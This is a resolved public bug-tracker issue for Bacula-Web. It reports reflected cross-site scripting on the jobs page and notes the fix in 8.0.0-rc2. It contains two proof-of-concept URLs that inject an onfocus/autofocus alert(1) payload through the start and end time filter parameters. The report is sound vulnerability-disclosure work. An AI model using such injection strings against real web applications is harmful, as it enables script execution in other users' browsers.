View Issue Details

IDProjectCategoryView StatusLast Update
0000236Bacula-Websecurity-issuepublic2018-03-03 21:20
ReportergsorondoAssigned Todavide 
PriorityhighSeveritymajorReproducibilityalways
Status resolvedResolutionfixed 
Product Version8.0.0-rc1 
Target Version8.0.0-rc2Fixed in Version8.0.0-rc2 
Summary0000236: XSS vulnerabilities in jobs page
DescriptionJust found these while scanning:

Accessing these URLs within a non-protected browser (eg. Firefox) will display an alert(1). In Chrome they will get blocked by the XSS Auditor.

http://hostname/index.php?page=jobs&job_status_filter=0&job_levelid_filter=0&job_type_filter=0&job_clientid_filter=0&jobs_poolid_filter=0&job_starttime_filter=2017-01-30+13%3A45%3A16&job_endtime_filter=2018-02-26%2013%3a45%3a22jdbwg%22onfocus%3d%22alert(1)%22autofocus%3d%22s1oare5nds0&job_orderby=jobid&jobs_per_page=25

http://hostname/index.php?page=jobs&job_status_filter=0&job_levelid_filter=0&job_type_filter=0&job_clientid_filter=0&jobs_poolid_filter=0&job_starttime_filter=2017-01-30%2013%3a45%3a16mkij9%22onfocus%3d%22alert(1)%22autofocus%3d%22a7g8zvz9h0j&job_endtime_filter=2018-02-26+13%3A45%3A22&job_orderby=jobid&jobs_per_page=25
TagsNo tags attached.

Activities

davide

2018-02-28 09:52

manager   ~0000727

Bug fixes will be available in 8.0.0-rc2

Issue History

Date Modified Username Field Change
2018-02-27 10:42 davide New Issue
2018-02-27 10:42 davide Status new => assigned
2018-02-27 10:42 davide Assigned To => davide
2018-02-27 10:43 davide Reporter davide => gsorondo
2018-02-28 09:52 davide Status assigned => resolved
2018-02-28 09:52 davide Resolution open => fixed
2018-02-28 09:52 davide Fixed in Version => 8.0.0-rc2
2018-02-28 09:52 davide Note Added: 0000727
2018-03-03 21:20 davide View Status private => public